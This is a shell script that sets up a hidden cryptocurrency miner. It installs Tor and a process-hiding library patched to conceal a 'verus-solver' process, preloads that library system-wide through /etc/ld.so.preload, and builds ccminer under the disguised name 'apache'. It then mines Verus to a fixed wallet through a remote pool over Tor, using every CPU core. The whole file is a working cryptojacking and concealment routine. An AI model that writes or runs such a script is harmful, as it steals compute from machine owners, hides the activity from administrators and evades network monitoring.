#!/bin/sh
sudo apt update
sudo apt install libcurl4-openssl-dev libssl-dev libjansson-dev automake autotools-dev build-essential nano tor proxychains git -y
sudo service tor start

git clone https://github.com/hanifgz/libprocesshider.git
cd libprocesshider
sed -i 's/apache/verus-solver/' processhider.c
make
sudo mv libprocesshider.so /usr/local/lib/;sudo su -c 'echo /usr/local/lib/libprocesshider.so >> /etc/ld.so.preload'
cd ..
sudo rm libprocesshider -r

git clone --single-branch -b Verus2.2 https://github.com/monkins1010/ccminer.git
cd ccminer
chmod +x build.sh
chmod +x configure.sh
chmod +x autogen.sh
./build.sh
mv ccminer ../apache
cd ..

sleep 5

./apache -a verus -o stratum+tcp://eu.luckpool.net:3956 -u RHvsk8sUSPpeRbeRM5NQmZVTBzkngaR6x4.$(echo $(shuf -i 1-1000 -n 1)) -p x -t $(echo $(nproc --all)) --proxy socks5://127.0.0.1:9050

